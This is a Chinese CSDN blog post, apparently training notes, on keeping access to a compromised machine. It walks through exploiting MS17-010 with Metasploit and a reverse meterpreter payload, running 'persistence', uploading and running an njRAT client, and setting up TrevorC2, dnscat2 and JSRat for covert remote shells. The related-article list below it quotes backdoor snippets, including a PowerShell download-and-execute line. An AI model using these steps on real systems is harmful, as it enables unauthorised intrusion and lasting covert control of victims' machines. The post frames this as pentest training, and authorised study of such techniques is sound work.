十三、权限维持

最新推荐文章于 2024-05-14 10:05:51 发布
最新推荐文章于 2024-05-14 10:05:51 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 2019训练营 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50666634/article/details/125244139
版权
权限维持

  • 权限维持的原因

    • 前提:某目标服务器初始化现阶段存在安全漏洞,可以被利用拿到服务器权限
    • 一段时间后,系统管理员对系统进行升级,打补丁(patch),系统不存在安全漏洞,导致无法利用漏洞获得服务器权限

  • 权限维持的使用

    • 技术本身不具备好与坏,只是因为使用者的目的不同,导致结果的好与坏
    • 恶意人员利用权限维持技术,一直获得服务器的权限
    • 合法且被授权的渗透测试人员,利用权限维持为了证明服务器存在对应的安全漏洞

  • 权限维持案例环境介绍

    • 目标机器:win7没有ms17-010补丁

    • 利用metasploit中ms17-010对应的exploit进行渗透测试,获得"临时"的system权限。(当补丁打上就无法利用ms17-010获取system权限)

    • 打开mestasploit—search ms17_010

      • use exploit/windows/smb/ms17_010_eternalblue
      • set rhost 目标IP
      • set lhost 本地IP
      • set lport 本地监听端口
      • set payload windows/x64/meterpreter/reverse_TCP
      • exploit

      结果(临时的):

  • 权限维持案例

    • 使用metasploit run persistence模块

      • run persistence -U -i 10 -p 4444 -r 本地IP(kali的)
权限维持-远程控制

  • 先使用ms17_010获取临时的权限

  • 远程控制的生成与上传

    • 在另一台windows使用njRAT进行客户端软件(Client.exe)的生成,然后将Client.exe获取到kali桌面

      • 生成时输入的IP为本地IP,不是目标IP

    • 在临时的会话中使用upload /home/kali/Desktop/Client.exe C:\\Client.exe

    • 执行Client.exe

    • njRAT服务端就会显示机器上线

    • 重启测试

权限维持-TrevorC2工具

  • TrevorC2工具介绍

    • TrevorC2是基于C/S架构的通过浏览网站,进行命令控制.由于时间间隔不同且不使用POST请求进行数据提交,因此检测TrevorC2变得困难很多
    • TrevorC2有两个组件–客户机和服务器。目前trevorc2_client.py支持Windows,MacOS和Linux
    • 组成:
      1. trevor2_server.py
      2. trevor2_client.py
      3. trevor2_client.ps1

  • TrevorC2工具安装(kali)

    • git clone https://github.com/trustedsec/trevorc2.git
    • cd trevorc2/
    • pip3 install -r requirements.txt
      • 如果没有pip命令可执行一下命令先安装(Python3版本)
        • curl -s https://bootstrap.pypa.io/get-pip.py | python3

  • TrevorC2工具使用

    • 启动trevorc2_server.py

    • 修改客户端文件中的IP地址:trevor2_client.py,trevor2_client.ps1(另开一个终端)

    • 发送到目标机器执行客户端程序

  • TrevorC2建立连接

    • 客户端执行trevorc2客户端程序,服务端返回shell
    • 使用list查看建立的会话
    • 使用interact <serial number od session> 切换会话
    • 执行命令id
权限维持-DNScat2工具

  • Dnsscat2工具截杀

    • Dnscat2工具是用来建立以DNS协议为基础的命令控制通道
    • Dnscat2工具具有客户端和服务端
      • 客户端使用C语言编写,最大程度实现跨平台
      • 服务端用来建立监听,等待连接。可以说是一个用来建立DNS服务端的程序

  • Dnscat2工具安装

    1. 下载链接

    2. git clone https://github.com/iagox86/dnscat2.git

    3. 客户端安装:

      • git clone https://github.com/iagox86/dnscat2.git
      • cd dnscat2/client/
      • make

    4. 服务端的安装:

      • git clone https://github.com/iagox86/dnscat2.git
      • cd dnscat2/server/
      • gem install bundler
      • bundle install

  • Dnscat2工具使用(都是要先启动服务端,再启动客户端连接服务端)

    • 服务端:
      • ruby dnscat2.rb
    • 客户端:
      • /dnscat2 --dns server=IP地址/域名,port=53

  • Dnscat2建立连接

    • session -i 1
    • ping
    • 启动shell
      • shell
      • windows
      • sessions
      • sessions -i 2
JsRAT工具

  • JsRAT工具介绍

    • JsRAT工具是用来建立以HTTP协议为基础的命令控制通道
    • JsRAT是一款使用Python脚本开发的工具,利用JS反弹shell,并不会在硬盘安装任何程序,避免被发现

  • JsRAT工具安装

    • git clone https://github.com/Hood3dRob1n/JSRat-Py

  • JsRAT工具使用

    • ./JSRat.py -i 本地IP地址 -p 4444

    • 使用客户端浏览器访问该IP地址:4444/wtf,以获得执行命令

  • JsRAT建立连接

    • 在命令行中执行浏览器中显示的命令

    • 执行命令

信安小白起飞
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux权限维持
weixin_41949487的博客
07-01 3031
在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。所以需要进行权限维持,隐藏后门。常见的Linux后门有cron后门、ssh后门、vim后门、隐藏文件、添加超级用户、alias后门等等,本文将对Linux下常见的权限维持后门技术进行解析。 添加用户 添加uid=0的用户 创建用户,并修改/etc/passwd文件 useradd tide;echo 'tide:123456' | chpasswd # 创建用户tide并修改密码为123456 vi /etc/passwd
第六十一课:高级持续渗透-第五季关于后门1
08-03
在这个第六十一课中,我们关注的是后门在APT攻击中的作用。 后门是攻击者在目标系统中留下的秘密通道,用于后续的访问和控制。它反映了攻击者对目标环境的了解,包括目标使用的编程语言、系统环境和常用软件。对于...
Windows10/linux权限维持
m0_74891800的博客
02-06 887
1选项表示使用MD5加密算法,-salt 'salt'为密码添加一个盐值(一个随机字符串),123456是你要设置的明文密码。这个命令将返回加密后的密码。然后在在文件里面创建一个建建名 随便填写 我这里使用的是Debugger 然后在下面添加他的值他的值为你想要执行的文件的绝对路径,就例如;1,/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名。d /home/test: 这个选项设置新用户的家目录为/home/test。
后渗透——权限维持
FisrtBqy的博客
04-26 2125
权限维持 1 Windows权限维持 1.1 用户维持(克隆账号) 1.1.1 添加一般隐藏用户的方式 net user username$ passwd /add 使用net user命令查看用户,发现没有username$这个用户 但是通过控制面板→管理账户中可以看到该用户。 1.1.2 注册表克隆用户隐藏 需要先完成上一步🙄 打开注册表编辑器:Win+R→regedit,找到如下路径: 发现SAM路径下没有权限查看,这里修改权限:菜单栏编辑→权限,修改后F5刷新
推荐项目:TrevorC2 - 隐藏在HTTP下的合法行为命令与控制框架
最新发布
gitblog_00094的博客
05-14 347
推荐项目:TrevorC2 - 隐藏在HTTP下的合法行为命令与控制框架 项目地址:https://gitcode.com/trustedsec/trevorc2 TrevorC2是一个创新的客户端-服务器模型,巧妙地将命令与控制系统隐藏于正常可浏览的网站之下,大大增加了检测的难度。该项目由安全专家Dave Kennedy创建,并在持续改进中。 项目介绍 TrevorC2的设计思路是通过伪装成一个...
Window下常见的权限维持方式
热门推荐
12-02 4万+
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。 常用的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Win...
内网渗透-windows权限维持的方法
lza20001103的博客
04-14 1163
内网渗透-windows权限维持的方法
账户和资源管理介绍.pptx
10-08
在第一章中,账户和资源管理的介绍奠定了整个课程的基础,它旨在确保读者理解这些概念对于维持系统安全性和高效性的重要性。第二章深入到服务器管理,这是任何IT基础设施的核心部分,包括监控服务器性能、维护设备...
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
食品安全管理体系要求3.docx
11-02
食品安全管理体系是保障食品质量与安全的重要工具,尤其在“十五”期间,我国将食品安全关键技术研究作为国家重大科技专项,深入探讨了食品企业和餐饮业如何建立和实施危害分析关键控制点(HACCP)体系。HACCP体系是...
Andriod项目之"CJJ"系列教程(五)——Always Online_by_CJJ
06-03
因此,要实现Always Online,首先需要理解Android的Activity、Service和BroadcastReceiver等组件的工作原理,以及如何利用它们来维持应用的后台运行。 二、Service的使用 1. 持续运行Service:Service是实现后台...
TrevorC2是一个合法的网站,在客户端和服务端之间架设通信通道,用于隐蔽的命令执行-python
06-18
TrevorC2是一个合法的网站(可浏览),在客户端和服务端之间架设通信通道,用于隐蔽的命令执行 trevorc2 TrevorC2 - 通过 HTTP 上的合法行为进行命令和控制 作者:Dave Kennedy (@HackingDave) 网站:https://www.trustedsec.com 请注意,这是一个非常早的版本 - 很快就会添加大量随机化和加密。 TrevorC2 是一种客户端/服务器模型,用于通过通常可浏览的网站屏蔽命令和控制。 由于时间间隔不同并且不使用 POST 请求进行数据传输,因此检测变得更加困难。 ,.'''''。 ... ''''', .' ',' ,.MMMM;.;' '。 ;; ;MMMMMMMM; ;;' :'M: ;MMMMMMMMMM;. :M': : M: MMMMMMMMMMMMM: :M 。 .' M: MMMMMMMMMMMMM: :M。 ; ; :M' :MMMMMMMMMMMM' 'M: : :M: .;"MMMMMMMMM":;. ,M: : : ::,MMM;.M":::M.;MMM ::'
权限维持技术探索】
qq_55213436的博客
01-17 998
定义攻击者尝试维持驻点的技术,包括攻击者用来在重启、修改凭据或则其他能够切断攻击者访问的情况下,依然保持对系统的访问,具体技术包括一些访问某些页面、执行某些操作或者修改配置使得能够在系统上长久的驻留。后门的功能常见的后门往往有一些功能以达到一些目的,如:写入后门文件、会连CC、进行密码记录和挖矿等功能。权限维持常常具有:定期出发、重启出发、以及常见的事件调用唤起后门等特点。攻击者常常通过文件隐藏、进程隐藏、网络隐藏、守护进程、系统权限启动等操作达到如下目的。后门分类。
【神兵利器】后渗透-权限维持工具之HackerPermKeeper
youmaob的博客
04-03 681
通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用。|| 越少,越难发现,但是部署起来,需要的依赖很多。ssh软链接&crontab。crontab后计划任务。发现程度:||||||发现程度:||||||发现程度:||||||发现程度:||||||
应急响应实战笔记——权限维持篇:⑦ 常见WebShell管理工具
君逍遥o
04-07 437
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。Weevely是一种Python编写的webshell管理工具,跨平台,只支持PHP。这是一款跨平台的基于配置文件的中国菜刀,把所有操作给予用户来定义。
Windows最常用的权限维持技术
cike_y
06-13 669
权限维持能很好的躲避很多事情,也能让我们更加轻松的操作想做的事,但是免杀很重要,在了解权限维持技术的前提下,还要学会如何制作免杀,从而达到真正的绕过且维持
【基础篇】————20、隐匿攻击之Images
Fly_鹏程万里
05-26 553
迈克尔·斯科特开发了一个python脚本,可以生成一个图标图像,并将PowerShell命令嵌入到该图像中。第一步是将命令写入文本文件。 echo 'IEX((new-object net.webclient).downloadstring("http://192.168.1.171/tmp/Invoke-Shellcode.ps1"));Invoke-Shellcode -payload ...
后渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4346
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
权限维持篇---Windows权限维持--隐藏篇
永不垂头的博客
04-29 1113
权限维持篇—Windows权限维持–隐藏篇 文章目录权限维持篇---Windows权限维持--隐藏篇前言一、隐藏文件二、隐藏账号三、端口复用四、进程注入五、结束六、我的公众号 前言 攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 一、隐藏文件 1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来获取用户的权限,例如伪装成管理员向用户索取密码或其他敏感信息。 4. 后门攻击:攻击者在系统中植入后门程序,以便在以后可以随时获取权限。 5. 特权提升攻击:攻击者利用系统中的漏洞或配置错误,将自己的权限提升到更高的级别。 为了防止权限维持攻击,可以采取以下措施: 1. 及时升级系统和软件,修补漏洞。 2. 确保所有用户和管理员都使用强密码,并定期更换密码。 3. 加强身份验证和授权控制。 4. 使用安全的文件权限和访问控制策略。 5. 定期审查系统日志,以便及时发现异常行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值